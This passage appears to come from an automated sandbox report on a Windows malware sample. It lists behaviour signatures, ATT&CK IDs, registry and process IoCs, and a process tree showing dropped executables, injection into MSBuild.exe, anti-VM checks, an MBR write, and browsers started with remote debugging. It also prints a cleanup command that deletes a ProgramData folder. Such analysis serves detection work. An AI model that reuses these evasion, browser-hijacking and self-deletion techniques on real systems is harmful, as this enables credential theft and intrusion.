Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe

Delays execution with timeout.exe 4 IoCs

defense_evasion

pid	Process
2776	timeout.exe
5228	timeout.exe
20460	timeout.exe
4580	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
6388	taskkill.exe
3004	taskkill.exe
12504	taskkill.exe
10140	taskkill.exe
9840	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133876854241050037"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies registry key 1 TTPs 5 IoCs

Modify Registry

T1112

pid	Process
3124	reg.exe
4956	reg.exe
2480	reg.exe
7984	reg.exe
18740	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5312	schtasks.exe
5820	schtasks.exe

Suspicious behavior: EnumeratesProcesses 49 IoCs

pid	Process
5788	6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe
5788	6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe
5420	rapes.exe
5420	rapes.exe
1112	rapes.exe
1112	rapes.exe
4972	MSBuild.exe
4972	MSBuild.exe
4972	MSBuild.exe
4972	MSBuild.exe
2280	Rm3cVPI.exe
2280	Rm3cVPI.exe
2280	Rm3cVPI.exe
2280	Rm3cVPI.exe
5520	MSBuild.exe
5520	MSBuild.exe
404	9c947054f9.exe
404	9c947054f9.exe
5520	MSBuild.exe
5520	MSBuild.exe
4460	chrome.exe
4460	chrome.exe
560	MSBuild.exe
560	MSBuild.exe
560	MSBuild.exe
560	MSBuild.exe
5520	MSBuild.exe
5520	MSBuild.exe
5520	MSBuild.exe
5520	MSBuild.exe
5520	MSBuild.exe
5520	MSBuild.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
5520	MSBuild.exe
5520	MSBuild.exe
5244	TempNXU4DHE3AACKUKPPOKTRV8U7NPCGRFJZ.EXE
5244	TempNXU4DHE3AACKUKPPOKTRV8U7NPCGRFJZ.EXE
2280	powershell.exe
2280	powershell.exe
2280	powershell.exe
3880	MSBuild.exe
3880	MSBuild.exe
3880	MSBuild.exe
3880	MSBuild.exe
2668	powershell.exe
2668	powershell.exe
2668	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
664	Process not Found
664	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4808	msedge.exe
4808	msedge.exe
4808	msedge.exe
4808	msedge.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4460	chrome.exe
Token: SeCreatePagefilePrivilege	4460	chrome.exe
Token: SeShutdownPrivilege	4460	chrome.exe
Token: SeCreatePagefilePrivilege	4460	chrome.exe
Token: SeShutdownPrivilege	4460	chrome.exe
Token: SeCreatePagefilePrivilege	4460	chrome.exe
Token: SeShutdownPrivilege	4460	chrome.exe
Token: SeCreatePagefilePrivilege	4460	chrome.exe
Token: SeShutdownPrivilege	4460	chrome.exe
Token: SeCreatePagefilePrivilege	4460	chrome.exe
Token: SeShutdownPrivilege	4460	chrome.exe
Token: SeCreatePagefilePrivilege	4460	chrome.exe
Token: SeShutdownPrivilege	4460	chrome.exe
Token: SeCreatePagefilePrivilege	4460	chrome.exe
Token: SeDebugPrivilege	4608	powershell.exe
Token: SeDebugPrivilege	2280	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe

Suspicious use of FindShellTrayWindow 31 IoCs

pid	Process
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4460	chrome.exe
4808	msedge.exe
4808	msedge.exe
1180	5aa90d41f5.exe
1180	5aa90d41f5.exe
1180	5aa90d41f5.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1180	5aa90d41f5.exe
1180	5aa90d41f5.exe
1180	5aa90d41f5.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5788 wrote to memory of 5420	5788	6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe	89
PID 5788 wrote to memory of 5420	5788	6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe	89
PID 5788 wrote to memory of 5420	5788	6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe	89
PID 5420 wrote to memory of 3456	5420	rapes.exe	96
PID 5420 wrote to memory of 3456	5420	rapes.exe	96
PID 3456 wrote to memory of 4972	3456	EPTwCQd.exe	97
PID 3456 wrote to memory of 4972	3456	EPTwCQd.exe	97
PID 3456 wrote to memory of 4972	3456	EPTwCQd.exe	97
PID 3456 wrote to memory of 4972	3456	EPTwCQd.exe	97
PID 3456 wrote to memory of 4972	3456	EPTwCQd.exe	97
PID 3456 wrote to memory of 4972	3456	EPTwCQd.exe	97
PID 3456 wrote to memory of 4972	3456	EPTwCQd.exe	97
PID 3456 wrote to memory of 4972	3456	EPTwCQd.exe	97
PID 3456 wrote to memory of 4972	3456	EPTwCQd.exe	97
PID 5420 wrote to memory of 2280	5420	rapes.exe	100
PID 5420 wrote to memory of 2280	5420	rapes.exe	100
PID 5420 wrote to memory of 2280	5420	rapes.exe	100
PID 5420 wrote to memory of 3232	5420	rapes.exe	101
PID 5420 wrote to memory of 3232	5420	rapes.exe	101
PID 3232 wrote to memory of 5520	3232	UYpk7xI.exe	102
PID 3232 wrote to memory of 5520	3232	UYpk7xI.exe	102
PID 3232 wrote to memory of 5520	3232	UYpk7xI.exe	102
PID 3232 wrote to memory of 5520	3232	UYpk7xI.exe	102
PID 3232 wrote to memory of 5520	3232	UYpk7xI.exe	102
PID 3232 wrote to memory of 5520	3232	UYpk7xI.exe	102
PID 3232 wrote to memory of 5520	3232	UYpk7xI.exe	102
PID 3232 wrote to memory of 5520	3232	UYpk7xI.exe	102
PID 3232 wrote to memory of 5520	3232	UYpk7xI.exe	102
PID 3232 wrote to memory of 5520	3232	UYpk7xI.exe	102
PID 3232 wrote to memory of 5520	3232	UYpk7xI.exe	102
PID 3232 wrote to memory of 5520	3232	UYpk7xI.exe	102
PID 5420 wrote to memory of 404	5420	rapes.exe	103
PID 5420 wrote to memory of 404	5420	rapes.exe	103
PID 5420 wrote to memory of 404	5420	rapes.exe	103
PID 5520 wrote to memory of 4460	5520	MSBuild.exe	104
PID 5520 wrote to memory of 4460	5520	MSBuild.exe	104
PID 4460 wrote to memory of 3460	4460	chrome.exe	105
PID 4460 wrote to memory of 3460	4460	chrome.exe	105
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106
PID 4460 wrote to memory of 3260	4460	chrome.exe	106

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe
"C:\Users\Admin\AppData\Local\Temp\6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5788
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:5420
- - C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe
    "C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3456
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4972
- - C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe
    "C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2280
- - C:\Users\Admin\AppData\Local\Temp\10361660101\UYpk7xI.exe
    "C:\Users\Admin\AppData\Local\Temp\10361660101\UYpk7xI.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3232
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5520
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:4460
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9797edcf8,0x7ff9797edd04,0x7ff9797edd10
        6⤵
        
        PID:3460
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1984,i,14649705729715165619,982252578746360920,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1976 /prefetch:2
        6⤵
        
        PID:3260
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1560,i,14649705729715165619,982252578746360920,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2264 /prefetch:3
        6⤵
        
        PID:936
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2368,i,14649705729715165619,982252578746360920,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2384 /prefetch:8
        6⤵
        
        PID:4952
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,14649705729715165619,982252578746360920,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3232 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4128
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3244,i,14649705729715165619,982252578746360920,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3268 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5936
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,14649705729715165619,982252578746360920,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4296 /prefetch:2
        6⤵
        Uses browser remote debugging
        
        PID:6028
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4656,i,14649705729715165619,982252578746360920,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4680 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5256
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5344,i,14649705729715165619,982252578746360920,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5360 /prefetch:8
        6⤵
        
        PID:4156
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5364,i,14649705729715165619,982252578746360920,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5420 /prefetch:8
        6⤵
        
        PID:5996
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5408,i,14649705729715165619,982252578746360920,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5460 /prefetch:8
        6⤵
        
        PID:2332
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5744,i,14649705729715165619,982252578746360920,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5356 /prefetch:8
        6⤵
        
        PID:3456
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5488,i,14649705729715165619,982252578746360920,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5524 /prefetch:8
        6⤵
        
        PID:3548
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5768,i,14649705729715165619,982252578746360920,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5708 /prefetch:8
        6⤵
        
        PID:3920
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies registry class
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:4808
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x268,0x7ff978f9f208,0x7ff978f9f214,0x7ff978f9f220
        6⤵
        
        PID:1772
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1768,i,15741835703873481646,3108880310356380773,262144 --variations-seed-version --mojo-platform-channel-handle=2176 /prefetch:3
        6⤵
        
        PID:4656
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2140,i,15741835703873481646,3108880310356380773,262144 --variations-seed-version --mojo-platform-channel-handle=2128 /prefetch:2
        6⤵
        
        PID:3724
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2332,i,15741835703873481646,3108880310356380773,262144 --variations-seed-version --mojo-platform-channel-handle=2504 /prefetch:8
        6⤵
        
        PID:5812
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3552,i,15741835703873481646,3108880310356380773,262144 --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5744
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3556,i,15741835703873481646,3108880310356380773,262144 --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4648
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4200,i,15741835703873481646,3108880310356380773,262144 --variations-seed-version --mojo-platform-channel-handle=4240 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2668
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4208,i,15741835703873481646,3108880310356380773,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:2
        6⤵
        Uses browser remote debugging
        
        PID:5308
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3816,i,15741835703873481646,3108880310356380773,262144 --variations-seed-version --mojo-platform-channel-handle=3848 /prefetch:8
        6⤵
        
        PID:4540
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5264,i,15741835703873481646,3108880310356380773,262144 --variations-seed-version --mojo-platform-channel-handle=5296 /prefetch:8
        6⤵
        
        PID:4888
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5368,i,15741835703873481646,3108880310356380773,262144 --variations-seed-version --mojo-platform-channel-handle=5164 /prefetch:8
        6⤵
        
        PID:2204
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,15741835703873481646,3108880310356380773,262144 --variations-seed-version --mojo-platform-channel-handle=5332 /prefetch:8
        6⤵
        
        PID:116
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\e3ekx" & exit
        5⤵
        
        PID:684
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        6⤵
        Delays execution with timeout.exe
        
        PID:5228
- - C:\Users\Admin\AppData\Local\Temp\10362200101\9c947054f9.exe
    "C:\Users\Admin\AppData\Local\Temp\10362200101\9c947054f9.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Writes to the Master Boot Record (MBR)
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:404
- - C:\Users\Admin\AppData\Local\Temp\10363220101\FMXv4s3.exe
    "C:\Users\Admin\AppData\Local\Temp\10363220101\FMXv4s3.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5220
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:560
- - C:\Users\Admin\AppData\Local\Temp\10364170101\amnew.exe
    "C:\Users\Admin\AppData\Local\Temp\10364170101\amnew.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2176
  - - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
      "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
      4⤵
      Downloads MZ/PE file
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1276
    - - C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5468
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:4632
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3880
    - - C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1288
